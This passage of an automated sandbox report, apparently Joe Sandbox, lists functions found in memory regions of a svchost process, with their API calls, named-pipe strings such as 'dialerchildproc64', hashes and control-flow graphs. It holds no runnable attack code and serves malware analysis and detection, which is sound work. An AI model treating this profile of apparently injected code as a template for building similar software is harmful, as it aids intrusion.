                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                          • API String ID: 190073905-1786718095
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: ceb190c1bc5cb76a39468d0dcf2336ec5ebfdbce9e152840d3fa6cc9d2bd33da
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: 6381CE72704E41C6FB52ABE594713D926E3EB96B80F548025EA0577F96EF38C84A8F00
                                                                          Function 00000195DD5CCE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetLastError.KERNEL32 ref: 00000195DD5CCE37
                                                                          • FlsGetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCE4C
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCE6D
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCE9A
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCEAB
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCEBC
                                                                          • SetLastError.KERNEL32 ref: 00000195DD5CCED7
                                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF0D
                                                                          • FlsSetValue.KERNEL32(?,?,00000001,00000195DD5CECCC,?,?,?,?,00000195DD5CBF9F,?,?,?,?,?,00000195DD5C7AB0), ref: 00000195DD5CCF2C
                                                                            • Part of subcall function 00000195DD5CD6CC: HeapAlloc.KERNEL32 ref: 00000195DD5CD721
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF54
                                                                            • Part of subcall function 00000195DD5CD744: HeapFree.KERNEL32 ref: 00000195DD5CD75A
                                                                            • Part of subcall function 00000195DD5CD744: GetLastError.KERNEL32 ref: 00000195DD5CD764
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF65
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF76
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 570795689-0
                                                                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction ID: 5deeaa700c7bca527ac3e0ef52b0542e40d86773dc9f6c8a69b3fdc468513023
                                                                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction Fuzzy Hash: B5412034303E4C82FB6BA7EE59753F913C35B857B4F140724A936E6ED6DE2894818700
                                                                          Function 00000195DD5C2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                          • API String ID: 2171963597-1373409510
                                                                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction ID: ef64e02e287f94d0d9415c348699ab4dc805c8a96bd9a803ab77d90ce42376f4
                                                                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction Fuzzy Hash: 09217932614B4483FB118BA5F4647AA73E2F789BA5F544215EA5953FA8CF3CC14ACB00
                                                                          Function 00000195DD5CA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 590 195dd5ca544-195dd5ca5ac call 195dd5cb414 593 195dd5ca5b2-195dd5ca5b5 590->593 594 195dd5caa13-195dd5caa1b call 195dd5cc748 590->594 593->594 595 195dd5ca5bb-195dd5ca5c1 593->595 597 195dd5ca690-195dd5ca6a2 595->597 598 195dd5ca5c7-195dd5ca5cb 595->598 600 195dd5ca963-195dd5ca967 597->600 601 195dd5ca6a8-195dd5ca6ac 597->601 598->597 602 195dd5ca5d1-195dd5ca5dc 598->602 605 195dd5ca9a0-195dd5ca9aa call 195dd5c9634 600->605 606 195dd5ca969-195dd5ca970 600->606 601->600 603 195dd5ca6b2-195dd5ca6bd 601->603 602->597 604 195dd5ca5e2-195dd5ca5e7 602->604 603->600 607 195dd5ca6c3-195dd5ca6ca 603->607 604->597 608 195dd5ca5ed-195dd5ca5f7 call 195dd5c9634 604->608 605->594 619 195dd5ca9ac-195dd5ca9cb call 195dd5c7940 605->619 606->594 609 195dd5ca976-195dd5ca99b call 195dd5caa1c 606->609 611 195dd5ca894-195dd5ca8a0 607->611 612 195dd5ca6d0-195dd5ca707 call 195dd5c9a10 607->612 608->619 623 195dd5ca5fd-195dd5ca628 call 195dd5c9634 * 2 call 195dd5c9d24 608->623 609->605 611->605 616 195dd5ca8a6-195dd5ca8aa 611->616 612->611 628 195dd5ca70d-195dd5ca715 612->628 620 195dd5ca8ba-195dd5ca8c2 616->620 621 195dd5ca8ac-195dd5ca8b8 call 195dd5c9ce4 616->621 620->605 627 195dd5ca8c8-195dd5ca8d5 call 195dd5c98b4 620->627 621->620 634 195dd5ca8db-195dd5ca8e3 621->634 659 195dd5ca62a-195dd5ca62e 623->659 660 195dd5ca648-195dd5ca652 call 195dd5c9634 623->660 627->605 627->634 632 195dd5ca719-195dd5ca74b 628->632 636 195dd5ca751-195dd5ca75c 632->636 637 195dd5ca887-195dd5ca88e 632->637 639 195dd5ca8e9-195dd5ca8ed 634->639 640 195dd5ca9f6-195dd5caa12 call 195dd5c9634 * 2 call 195dd5cc6a8 634->640 636->637 641 195dd5ca762-195dd5ca77b 636->641 637->611 637->632 643 195dd5ca8ef-195dd5ca8fe call 195dd5c9ce4 639->643 644 195dd5ca900 639->644 640->594 645 195dd5ca781-195dd5ca7c6 call 195dd5c9cf8 * 2 641->645 646 195dd5ca874-195dd5ca879 641->646 654 195dd5ca903-195dd5ca90d call 195dd5cb4ac 643->654 644->654 671 195dd5ca804-195dd5ca80a 645->671 672 195dd5ca7c8-195dd5ca7ee call 195dd5c9cf8 call 195dd5cac38 645->672 651 195dd5ca884 646->651 651->637 654->605 668 195dd5ca913-195dd5ca961 call 195dd5c9944 call 195dd5c9b50 654->668 659->660 665 195dd5ca630-195dd5ca63b 659->665 660->597 675 195dd5ca654-195dd5ca674 call 195dd5c9634 * 2 call 195dd5cb4ac 660->675 665->660 667 195dd5ca63d-195dd5ca642 665->667 667->594 667->660 668->605 679 195dd5ca87b 671->679 680 195dd5ca80c-195dd5ca810 671->680 690 195dd5ca7f0-195dd5ca802 672->690 691 195dd5ca815-195dd5ca872 call 195dd5ca470 672->691 696 195dd5ca68b 675->696 697 195dd5ca676-195dd5ca680 call 195dd5cb59c 675->697 684 195dd5ca880 679->684 680->645 684->651 690->671 690->672 691->684 696->597 700 195dd5ca9f0-195dd5ca9f5 call 195dd5cc6a8 697->700 701 195dd5ca686-195dd5ca9ef call 195dd5c92ac call 195dd5caff4 call 195dd5c94a0 697->701 700->640 701->700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: ff241bfc108c8e41cf32293f5c139143a9d96e7d242899cc36c30a4197855322
                                                                          • Instruction ID: 9c2520efcc87ac771d522e1eb6396a81ecb0ce0daac719ccbdf896b70f129e44
                                                                          • Opcode Fuzzy Hash: ff241bfc108c8e41cf32293f5c139143a9d96e7d242899cc36c30a4197855322
                                                                          • Instruction Fuzzy Hash: 07E18D72606B488AEB32DFA9D4913DD7BE2F745B98F100115EE89A7F99CB35C481CB00
                                                                          Function 00000195DD599944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 469 195dd599944-195dd5999ac call 195dd59a814 472 195dd5999b2-195dd5999b5 469->472 473 195dd599e13-195dd599e1b call 195dd59bb48 469->473 472->473 474 195dd5999bb-195dd5999c1 472->474 476 195dd599a90-195dd599aa2 474->476 477 195dd5999c7-195dd5999cb 474->477 479 195dd599d63-195dd599d67 476->479 480 195dd599aa8-195dd599aac 476->480 477->476 481 195dd5999d1-195dd5999dc 477->481 482 195dd599da0-195dd599daa call 195dd598a34 479->482 483 195dd599d69-195dd599d70 479->483 480->479 484 195dd599ab2-195dd599abd 480->484 481->476 485 195dd5999e2-195dd5999e7 481->485 482->473 495 195dd599dac-195dd599dcb call 195dd596d40 482->495 483->473 486 195dd599d76-195dd599d9b call 195dd599e1c 483->486 484->479 488 195dd599ac3-195dd599aca 484->488 485->476 489 195dd5999ed-195dd5999f7 call 195dd598a34 485->489 486->482 492 195dd599ad0-195dd599b07 call 195dd598e10 488->492 493 195dd599c94-195dd599ca0 488->493 489->495 499 195dd5999fd-195dd599a28 call 195dd598a34 * 2 call 195dd599124 489->499 492->493 504 195dd599b0d-195dd599b15 492->504 493->482 496 195dd599ca6-195dd599caa 493->496 501 195dd599cba-195dd599cc2 496->501 502 195dd599cac-195dd599cb8 call 195dd5990e4 496->502 537 195dd599a48-195dd599a52 call 195dd598a34 499->537 538 195dd599a2a-195dd599a2e 499->538 501->482 508 195dd599cc8-195dd599cd5 call 195dd598cb4 501->508 502->501 517 195dd599cdb-195dd599ce3 502->517 510 195dd599b19-195dd599b4b 504->510 508->482 508->517 514 195dd599b51-195dd599b5c 510->514 515 195dd599c87-195dd599c8e 510->515 514->515 518 195dd599b62-195dd599b7b 514->518 515->493 515->510 519 195dd599df6-195dd599e12 call 195dd598a34 * 2 call 195dd59baa8 517->519 520 195dd599ce9-195dd599ced 517->520 522 195dd599b81-195dd599bc6 call 195dd5990f8 * 2 518->522 523 195dd599c74-195dd599c79 518->523 519->473 524 195dd599d00 520->524 525 195dd599cef-195dd599cfe call 195dd5990e4 520->525 550 195dd599c04-195dd599c0a 522->550 551 195dd599bc8-195dd599bee call 195dd5990f8 call 195dd59a038 522->551 529 195dd599c84 523->529 533 195dd599d03-195dd599d0d call 195dd59a8ac 524->533 525->533 529->515 533->482 548 195dd599d13-195dd599d61 call 195dd598d44 call 195dd598f50 533->548 537->476 554 195dd599a54-195dd599a74 call 195dd598a34 * 2 call 195dd59a8ac 537->554 538->537 542 195dd599a30-195dd599a3b 538->542 542->537 547 195dd599a3d-195dd599a42 542->547 547->473 547->537 548->482 555 195dd599c0c-195dd599c10 550->555 556 195dd599c7b 550->556 570 195dd599bf0-195dd599c02 551->570 571 195dd599c15-195dd599c72 call 195dd599870 551->571 575 195dd599a76-195dd599a80 call 195dd59a99c 554->575 576 195dd599a8b 554->576 555->522 560 195dd599c80 556->560 560->529 570->550 570->551 571->560 579 195dd599df0-195dd599df5 call 195dd59baa8 575->579 580 195dd599a86-195dd599def call 195dd5986ac call 195dd59a3f4 call 195dd5988a0 575->580 576->476 579->519 580->579
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592258832.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction ID: 8578d22811c705561b9a0c63265d0fa22d72dfafe6aec0b6b4f758a2598a20e0
                                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction Fuzzy Hash: 3EE18C72604B40CAEB62DBA5D4A03DD7BE2F756B98F142116EE8967F99CB34C191CF00
                                                                          Function 00000195DD5CF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeLibraryProc
                                                                          • String ID: api-ms-$ext-ms-
                                                                          • API String ID: 3013587201-537541572
                                                                          • Opcode ID: ec1e5874304155dc1a340afb949db992b9dfa589f06c8a0471ec677ed5d909ab
                                                                          • Instruction ID: f94411bdc3c5adc3673d068f26baf74004ea3de06b1d5fa0a00e338998d396b5
                                                                          • Opcode Fuzzy Hash: ec1e5874304155dc1a340afb949db992b9dfa589f06c8a0471ec677ed5d909ab
                                                                          • Instruction Fuzzy Hash: 4741B236313E0492EB17DB9AA8647D623E7BB45BA0F494125DD0AE7F84EE3CC44A8350
                                                                          Function 00000195DD5C104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                          • String ID: d
                                                                          • API String ID: 3743429067-2564639436
                                                                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction ID: 85125c25dfd785958ae00b37ce84ac9a8513cd9fd1755175fa0b0cf5bc826ac5
                                                                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction Fuzzy Hash: CC418C33214F88C6E761CFA5E45479A77E2F389B89F048129DA8957B58DF3CC489CB00
                                                                          Function 00000195DD5CD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FlsGetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD087
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0A6
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0CE
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0DF
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0F0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: 1%$Y%
                                                                          • API String ID: 3702945584-1395475152
                                                                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction ID: b29a2c01b9a529d3d397189201e4ebb9e472c9377beb16884566e216c47c93f0
                                                                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction Fuzzy Hash: 47112134707A8881FB6A67AF59717E963C35B847F0F1443269839F6EDAEE28C5428700
                                                                          Function 00000195DD5C7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID:
                                                                          • API String ID: 190073905-0
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: db17aeae78a532267f4925ec03955f9628ff8aa19b2b3ce37216714fce8ee9dc
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: 7281A031602E0F86FB63ABEE98713D967D3AB45780F145415DA05F7F96EB78C8868700
                                                                          Function 00000195DD5C9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                          • String ID: api-ms-
                                                                          • API String ID: 2559590344-2084034818
                                                                          • Opcode ID: 9d3cf39bc7784cd844787513709c7d04fd8390ef6f847f410b46324ceba80f6d
                                                                          • Instruction ID: 8d15efdb5329dbd6f8d908350e729aaeb4b7b6a33fa5c2f06519c4c6539ee195
                                                                          • Opcode Fuzzy Hash: 9d3cf39bc7784cd844787513709c7d04fd8390ef6f847f410b46324ceba80f6d
                                                                          • Instruction Fuzzy Hash: 0E31E531213E04D1EF13DBCAA4207D523D6B759BA1F590625DD1EABB98EF38C245C710
                                                                          Function 00000195DD5D3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                          • String ID: CONOUT$
                                                                          • API String ID: 3230265001-3130406586
                                                                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction ID: 900ef7d4bcd6fd2864e51168dc1007f1dfbbe5e213ae5e9ff28ad5abe65b03b1
                                                                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction Fuzzy Hash: 2C11BF32310F4086E7629B96E8643A9B3E1F788FE5F044224EA1A97B94CF78C8058750
                                                                          Function 00000195DD5C3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                          • String ID: wr
                                                                          • API String ID: 1092925422-2678910430
                                                                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction ID: 42188e63fbb78b0732cb93c59acbf515d5b68af2c84de3977fd9872ca41c66e2
                                                                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction Fuzzy Hash: 38118E36302F4982FF559B95F4242A963F2F749B85F040028DE8953B94EF3DC545C714
                                                                          Function 00000195DD5C5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$Current$Context
                                                                          • String ID:
                                                                          • API String ID: 1666949209-0
                                                                          • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                          • Instruction ID: 195e277db55ff97f3f99f451c10649e3fcd3ec1e2be31b8428dbef89db2187c3
                                                                          • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                          • Instruction Fuzzy Hash: 12D17876205F8882DB71DB9AE4A439A77E1F388B84F500116EA8E97FA5DF3CC551CB40
                                                                          Function 00000195DD5C2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID: dialer
                                                                          • API String ID: 756756679-3528709123
                                                                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction ID: fc4c9099da629ec678108cb9cb41e40dfa530a30d66993f12becd6c4ba3f9dba
                                                                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction Fuzzy Hash: 0C317036702F5DC2E716DF9AE561BA977E2FB44B84F084020DE48A7F55EB34C4A18740
                                                                          Function 00000195DD5CCFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 2506987500-0
                                                                          • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction ID: 8fdc15ff09e63732eb275527d3260f2eb5a265f6af426b64fb26ff3aadc1099c
                                                                          • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction Fuzzy Hash: C9115E34203E4882FB66A7AE59757B963C39B847B4F144725A836F6FD6EE6884428700
                                                                          Function 00000195DD5C199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                          • String ID:
                                                                          • API String ID: 517849248-0
                                                                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction ID: 094941dede99f9d048632fe007c60956db5d273133d38dce1c9db68577c35704
                                                                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction Fuzzy Hash: F4018C31300E4882EB11DB92A86879963E2F788FC1F884035DE4DA3B54DF3CC98AC750
                                                                          Function 00000195DD5C36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                          • String ID:
                                                                          • API String ID: 449555515-0
                                                                          • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction ID: a4c37ed03e2153ec921c4fe35d3b930d694565bbf9533148a8bdd7b871a42841
                                                                          • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction Fuzzy Hash: 00014075312F4882FF269BA6E82879573E2BB45B86F040424CE4967B54EF3DC149C710
                                                                          Function 00000195DD5C9005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 2395640692-629598281
                                                                          • Opcode ID: 23eacf76fefb4f7f9308e1222479b694a5ecefb866da3529da442ff7070fa44f
                                                                          • Instruction ID: b6a9a57366d7e32ba7d8204e1a09c4ae5b67336b6113bd5d1bf03962d45849d0
                                                                          • Opcode Fuzzy Hash: 23eacf76fefb4f7f9308e1222479b694a5ecefb866da3529da442ff7070fa44f
